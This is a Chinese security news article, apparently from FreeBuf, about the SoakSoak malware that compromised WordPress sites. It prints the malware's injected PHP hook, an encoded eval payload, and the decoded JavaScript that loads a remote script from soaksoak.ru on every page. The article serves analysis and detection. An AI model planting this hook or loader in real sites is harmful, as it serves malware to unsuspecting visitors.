专栏首页FreeBuf10万WordPress网站沦陷:恶意软件SoakSoak来了

10万WordPress网站沦陷:恶意软件SoakSoak来了

WordPress是一款使用PHP语言开发的博客平台,用户架设属于自己的博客,也可以把 WordPress当作一个内容管理系统(CMS)来使用。近几个月,WordPress安全漏洞事件频发,包括 免费主题暗藏后门,波及WordPress等知名CMS系统,WordPress 4.0以下版本存在跨站脚本漏洞。而现在,一款广泛传播的恶意软件已经感染了100,000多个WordPress网站,而且数字仍在增加。

Google将超过11,000个域名纳入黑名单

消息先是周日早上在WordPress社区传播,起因是Google将超过11,000域名列入黑名单,这些网站都被一款最新的恶意软件攻击,软件来源于SoakSoak.ru,所以起名为SoakSoak 恶意软件。由于现在互联网上有超过7亿网站使用WordPress,所以这样的恶意软件影响巨大。

一经感染,网站就会出现异常行为,包括重定向到SoakSoak.ru。访问网站的用户也可能会自动下载恶意程序。Google已经将11,000个可能已经感染病毒的网站列入黑名单。

恶意软件分析

恶意软件SoakSoak会修改wp-includes/template-loader.php文件

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts",'FuncQueueObject');

这样使得wp-includes/js/swobject.js文件会在每一个页面上加载,这个swobject.js文件包含加密的恶意js代码。

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

解密后的代码:

eval(decodeURIComponent('(
function()
{
    //var ua = navigator.userAgent.toLowerCase();
    //if (ua.indexOf('chrome') != -1) return;
    var head=document.getElementsByTagName('head')[0];
    var script=document.createElement('script');
    script.type='text/javascript';
    script.src='http://soaksoak.ru/xteas/code';
    script.id='xxyyzz_petushok';
    head.appendChild(script);
}()
);'));

恶意代码一旦被解密,就会加载SoakSoak.ru域名中的js:hxxp://soaksoak.ru/xteas/code

检测与预防 目前尚不清楚病毒是如何感染网站的。如果你正在使用WordPress,并且你担心你的网站被感染,Sucuri公司提供了免费网站扫描,你可以检测你的网站是否感染了病毒。

想要让你的WordPress更加安全,可参见:如何为WordPress做安全防护?

[参考来源THN & Sucuri,译/Sphinx,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]

本文分享自微信公众号 - FreeBuf(freebuf),作者:FreeBuf

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2014-12-16

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 针对WordPress的攻击调查

    WordPress是一个著名的开源内容管理系统(CMS),用于创建网站和个人博客,据估计,目前35%的网站都在使用CMS。

    FB客服
  • 浅谈拒绝服务攻击的原理与防御(7):用Python和C实现syn flood攻击

    ? 01 前言 以前做DDOS的实验都是用python来编写工具的,开始不会编写结构不会算校验和的时候就用scapy写,后来学会了报文结构开始自己构造各种报文...

    FB客服
  • 远控木马Posion Ivy开始肆虐缅甸和其它亚洲国家

    臭名昭著的远程控制木马Poison Ivy(后面称作PIVY)最近开始重新露出水面。并且出现了一些新行为。过去一年,已经发现PIVY为了种种企图攻击了许多亚洲国...

    FB客服
  • 网站建设教程:PageAdmin建站系统的安装

    PageAdmin建站系统最大的特点就是扩展灵活,加上可以免费下载,没有版权信息,国内拥有很多用户,很多中小网站制作公司也采用这款系统来给自己的客户做网站,在此...

    用户4831957
  • Redis 数据结构与内存管理策略(上)

    Redis 数据结构与内存管理策略(上) 标签: Redis Redis数据结构 Redis内存管理策略 Redis数据类型 Redis类型映射 作者:王清培(...

    王清培
  • 【趣学程序】Linux虚拟机安装

    通过阅读本文,你将了解到如何在windows上安装CentOS虚拟机。软件分享:VMWare软件及许可证:VMWare下载

    趣学程序-shaofeer
  • matomo的安装使用和体验

    matomo的前身是piwik,是一个强大的网站流量分析网站,我使用它的原因就是因为我的网站原先使用的是百度统计,但是百度统计最近貌似不稳定了,所以我想自己搭建...

    bboysoul
  • JavaScript学习笔记017-数值方法0Math0定时器

    Mr. 柳上原
  • 体验扁平化的WordPress 后台管理界面

    话说,从微软的Windows 8 的Metro 界面开始,到渐渐流行起来的扁平化网页设计,最后到现在最近的iOS7,扁平化已经渐渐成为趋势了。于是呢,WordP...

    Jeff
  • 搭建Redis集群

    skylark

扫码关注云+社区

领取腾讯云代金券